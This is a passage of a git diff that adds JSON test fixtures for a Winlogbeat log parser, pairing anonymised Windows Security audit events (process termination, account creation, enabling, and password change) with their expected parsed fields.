"{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..03a0543f5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json @@ -0,0 +1,127 @@ +{ + "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": "0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..99debf8cf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json @@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..ac581308e --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json @@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 